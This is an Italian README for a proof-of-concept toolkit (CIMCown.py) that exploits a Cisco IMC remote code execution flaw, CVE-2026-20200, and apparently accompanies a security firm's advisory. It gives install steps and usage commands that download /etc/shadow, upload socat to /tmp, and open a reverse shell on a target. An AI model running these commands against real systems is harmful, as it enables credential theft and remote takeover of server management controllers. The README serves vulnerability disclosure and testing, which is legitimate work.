
Toolkit PoC per lo sfruttamento di Cisco IMC RCE CVE-2026-20200
Christoph Peil @ NSIDE ATTACK LOGIC 2026
CVE: CVE-2026-20200
CVSS v3.1 (CISCO): 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v3.1 (NSIDE): 9.9 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Advisory: NSIDE-SA-2026-003
Blogpost: https://www.nsideattacklogic.de/en/cisco-imc-when-remote-management-becomes-a-backdoor-cve-2026-20200/
Questa proof-of-concept è solo a scopo dimostrativo e non può essere utilizzata per attività illegali. NSIDE ATTACK LOGIC non è responsabile di alcun danno causato dall'uso o dall'abuso di questo codice.
Questo exploit consente di scaricare file, caricare file e generare una reverse shell. Contiene diversi file Python della PoC, una cartella shell e una cartella download.
Nella cartella download sono posizionati tutti i file scaricati dal server, con il loro nome (es. /etc/passwd > passwd).
La cartella shell contiene tutto il necessario per una reverse shell. Il file lib.so è una piccola libreria, compilata per ARM, per eseguire semplicemente il binario su IMC in /tmp/main. Il comando esatto usato per compilarla si trova in util.py. Inoltre, nella cartella è presente un reverse_shell.go.example, una piccola reverse shell in Go, che deve essere compilata in precedenza per includere il vostro IP locale usato per la reverse shell.
Affinché la reverse shell funzioni, dovete prima compilarla con l'azione -a build.
sudo apt install golang-go
pip install -r requirements.txt
Usage: CIMCown.py [-h] [--proxy PROXY] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-v]
options:
-h, --help show this help message and exit
--proxy PROXY Set proxy to use, e.g. 127.0.0.1:8080 (Default: NONE)
-t, --host HOST Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
-U, --username USERNAME
-P, --password PASSWORD
-a, --action ACTION Action: test, download, upload, build, shell (default: test)
Test will connect to the CIMC and download the file /etc/passwd
-u, --uploadFile UPLOADFILE
File to upload
-p, --remoteFile REMOTEFILE
Remote file path to upload to
-d, --downloadFile DOWNLOADFILE
File to download, is saved into 'Download'
-v, --verbose Displays more information about cimc
Attenzione alla U maiuscola e alla P maiuscola per utente e password!
python ./CIMCown.py -U testAdmin -P testPassword -a test -t 192.168.10.2
python ./CIMCown.py -U testAdmin -P testPassword -a download -d '/etc/shadow' -t 192.168.10.2
python ./CIMCown.py -U testAdmin -P testPassword -a upload -u './shell/socat' -p '/tmp/socat' -t 192.168.10.2
python ./CIMCown.py -U testAdmin -P testPassword -a build
# action 'build' is needed before for local IP in revShell
python ./CIMCown.py -U testAdmin -P testPassword -a shell